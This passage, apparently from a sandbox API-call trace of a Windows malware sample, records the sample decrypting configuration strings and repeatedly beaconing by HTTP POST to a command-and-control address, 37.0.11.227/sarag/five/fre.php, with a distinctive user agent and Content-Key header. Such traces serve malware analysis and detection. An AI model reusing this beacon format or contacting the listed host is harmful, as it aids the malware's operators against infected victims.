hHeap=0x690000) returned 1 [0303.228] GetProcessHeap () returned 0x690000 [0303.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0303.229] closesocket (s=0x9f4) returned 0 [0303.229] GetProcessHeap () returned 0x690000 [0303.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0303.229] GetProcessHeap () returned 0x690000 [0303.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.230] GetProcessHeap () returned 0x690000 [0303.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0303.230] GetProcessHeap () returned 0x690000 [0303.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0303.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1498) returned 0x9f4 [0303.238] Sleep (dwMilliseconds=0xea60) [0303.239] GetProcessHeap () returned 0x690000 [0303.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0303.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.240] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.251] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0303.260] GetProcessHeap () returned 0x690000 [0303.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0303.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.261] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0303.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.262] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.267] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.267] GetProcessHeap () returned 0x690000 [0303.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0303.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.268] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0303.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.269] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0303.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.270] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0303.270] GetProcessHeap () returned 0x690000 [0303.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.271] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.271] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.272] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.273] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.273] GetProcessHeap () returned 0x690000 [0303.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0303.273] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0303.274] GetProcessHeap () returned 0x690000 [0303.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0303.274] GetProcessHeap () returned 0x690000 [0303.274] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.274] GetProcessHeap () returned 0x690000 [0303.275] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0303.275] GetProcessHeap () returned 0x690000 [0303.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0303.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.276] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0303.287] GetProcessHeap () returned 0x690000 [0303.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0303.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.290] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0303.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.291] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.292] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.292] GetProcessHeap () returned 0x690000 [0303.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0303.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.294] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0303.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.294] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0303.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.295] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0303.295] GetProcessHeap () returned 0x690000 [0303.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.296] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0303.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.297] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0303.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.301] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0303.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.302] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0303.302] GetProcessHeap () returned 0x690000 [0303.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0303.302] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0303.302] GetProcessHeap () returned 0x690000 [0303.302] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0303.302] socket (af=2, type=1, protocol=6) returned 0x9f8 [0303.302] connect (s=0x9f8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0303.328] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0303.328] GetProcessHeap () returned 0x690000 [0303.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0303.328] GetProcessHeap () returned 0x690000 [0303.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0303.329] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.363] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0303.363] GetProcessHeap () returned 0x690000 [0303.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0303.364] GetProcessHeap () returned 0x690000 [0303.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.364] GetProcessHeap () returned 0x690000 [0303.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0303.364] GetProcessHeap () returned 0x690000 [0303.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0303.366] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.367] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0303.367] GetProcessHeap () returned 0x690000 [0303.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0303.367] GetProcessHeap () returned 0x690000 [0303.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.368] send (s=0x9f8, buf=0x6ad508*, len=242, flags=0) returned 242 [0303.368] send (s=0x9f8, buf=0x6aba40*, len=159, flags=0) returned 159 [0303.368] GetProcessHeap () returned 0x690000 [0303.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0303.369] recv (in: s=0x9f8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0303.449] GetProcessHeap () returned 0x690000 [0303.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0303.450] GetProcessHeap () returned 0x690000 [0303.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0303.451] GetProcessHeap () returned 0x690000 [0303.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0303.452] GetProcessHeap () returned 0x690000 [0303.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0303.454] closesocket (s=0x9f8) returned 0 [0303.455] GetProcessHeap () returned 0x690000 [0303.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0303.455] GetProcessHeap () returned 0x690000 [0303.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.455] GetProcessHeap () returned 0x690000 [0303.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0303.455] GetProcessHeap () returned 0x690000 [0303.456] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0303.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14a8) returned 0x9f8 [0303.457] Sleep (dwMilliseconds=0xea60) [0303.459] GetProcessHeap () returned 0x690000 [0303.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0303.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0303.475] GetProcessHeap () returned 0x690000 [0303.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0303.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.476] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0303.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.477] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.482] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.482] GetProcessHeap () returned 0x690000 [0303.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0303.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.489] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0303.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.490] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0303.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.491] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0303.491] GetProcessHeap () returned 0x690000 [0303.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.492] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0303.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.493] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0303.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.494] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0303.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.495] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0303.495] GetProcessHeap () returned 0x690000 [0303.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0303.495] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0303.496] GetProcessHeap () returned 0x690000 [0303.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0303.496] GetProcessHeap () returned 0x690000 [0303.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.501] GetProcessHeap () returned 0x690000 [0303.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0303.502] GetProcessHeap () returned 0x690000 [0303.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0303.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.503] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.511] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0303.517] GetProcessHeap () returned 0x690000 [0303.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0303.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.518] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0303.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.519] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.520] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.520] GetProcessHeap () returned 0x690000 [0303.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0303.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.521] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0303.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.522] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0303.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0303.523] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0303.523] GetProcessHeap () returned 0x690000 [0303.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0303.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.524] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0303.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.525] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0303.526] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.526] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0303.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0303.527] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0303.527] GetProcessHeap () returned 0x690000 [0303.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0303.527] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0303.527] GetProcessHeap () returned 0x690000 [0303.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0303.528] socket (af=2, type=1, protocol=6) returned 0x9fc [0303.528] connect (s=0x9fc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0303.554] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0303.554] GetProcessHeap () returned 0x690000 [0303.554] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0303.554] GetProcessHeap () returned 0x690000 [0303.554] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0303.555] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.558] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0303.558] GetProcessHeap () returned 0x690000 [0303.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0303.558] GetProcessHeap () returned 0x690000 [0303.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.558] GetProcessHeap () returned 0x690000 [0303.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0303.558] GetProcessHeap () returned 0x690000 [0303.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0303.559] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0303.560] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0303.560] GetProcessHeap () returned 0x690000 [0303.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0303.560] GetProcessHeap () returned 0x690000 [0303.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0303.560] send (s=0x9fc, buf=0x6ad508*, len=242, flags=0) returned 242 [0303.560] send (s=0x9fc, buf=0x6aba40*, len=159, flags=0) returned 159 [0303.561] GetProcessHeap () returned 0x690000 [0303.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0303.561] recv (in: s=0x9fc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0303.651] GetProcessHeap () returned 0x690000 [0303.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0303.652] GetProcessHeap () returned 0x690000 [0303.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0303.652] GetProcessHeap () returned 0x690000 [0303.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0303.652] GetProcessHeap () returned 0x690000 [0303.652] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0303.653] closesocket (s=0x9fc) returned 0 [0303.653] GetProcessHeap () returned 0x690000 [0303.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0303.653] GetProcessHeap () returned 0x690000 [0303.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0303.654] GetProcessHeap () returned 0x690000 [0303.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0303.654] GetProcessHeap () returned 0x690000 [0303.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0303.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14c0) returned 0x9fc [0303.656] Sleep (dwMilliseconds=0xea60) [0303.660] GetProcessHeap () returned 0x690000 [0303.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0303.661] LoadLibraryW (lpLibFileName="ADVAPI32") 